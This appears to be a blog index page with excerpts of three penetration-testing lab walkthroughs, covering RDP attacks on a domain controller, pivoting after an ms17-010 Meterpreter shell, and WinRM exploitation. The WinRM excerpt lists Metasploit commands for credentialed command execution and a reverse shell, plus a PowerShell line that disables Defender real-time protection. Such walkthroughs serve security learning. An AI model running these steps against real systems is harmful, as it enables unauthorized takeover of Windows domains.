Exploiting RDP

First we will enable it into our EXTERNAL-RED domain controller aka windows server 2019. Fire up the VM and open server manager : Refresh the page it should show enabled Imagine if a threat actor or penetration tester could retrieve valid user credentials to access the root Domain Controller (DC) of an organization. Here, the threat actor could potentially take over and control the Windows domain environment, such as its policies, users, groups, and device accounts. Additionally, a threat actor can attempt to gain unauthorized access to client systems that use shared user credentials that are connected to the company’s domain through RDP and further set up persistent access to each compromised device to expand their foothold on the network. Let’s start exploiting: Open kali Let’s do a formal check if the target is visible on the network or not: nmap -sn 192.168.83.0/24 --exclude 192.168.83.128 3. Identifying if RDP is running on the target 192.168.83.140 ...

November 24, 2025 · 3 min · 618 words · 0x-s0M3n4th

Lateral Movement and Pivoting

Lateral Movement and Pivoting: Lateral movement allows the penetration tester to move further into the targeted network while discovering additional assets and exploiting security vulnerabilities on remote systems with the intent of stealing confidential data and expanding a foothold. Within many organizations, their network is usually segmented with routers and firewalls to prevent cyber-attacks and threats from propagating through their organization. However, there are various host devices that are configured with a dual-homed network connection that simply allows the host to be connected to two different IP networks at the same time. Our target will be Blue vm first. Fire up the Blue vm and kali machine Exploit it and get a shell using ms17-010 exploit. On the Meterpreter session, use the arp command to view the entries within the Address Resolution Protocol (ARP) cache of the compromised target. The ARP cache contains a list of IP-to-MAC address bindings of all the host devices that recently transmitted a message between themselves and the compromised host: meterpreter> arp We can see that the target machine is on two networks one is NAT aka PENTEST-NET(192.168.83.0/24) and another is 172.30.1.0/24(PIVOT-NET) 6. Next, use the ipconfig command within Meterpreter to view a list of network adapters and their IP addresses ...

November 24, 2025 · 8 min · 1568 words · 0x-s0M3n4th

WinRM Exploitation

In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems. exploitation: Open kali for scanning and exploitation: Open up msfconsole for exploitation part: sudo msfconsole use auxiliary/scanner/winrm/winrm_cmd msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140 RHOSTS => 192.168.83.140 msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator USERNAME => Administrator msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1 PASSWORD => P@ssword1 By default the command that will execute it is ipconfig /all Remember the setup of localuser for winrm access where we gave access to the user sysadmin , let’s try that: It actually worked. Now let’s try for Remote shell: msf6 > use exploit/windows/winrm/winrm_script_exec msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140 msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128 Also turn off real time protection in your windwos server , because it will quarantine the execution. use this command on powershell into your DC Set-MpPreference -DisableRealtimeMonitoring $true 3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit. 4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system, if not set it to false only, let’s see the options: ...

November 24, 2025 · 2 min · 313 words · 0x-s0M3n4th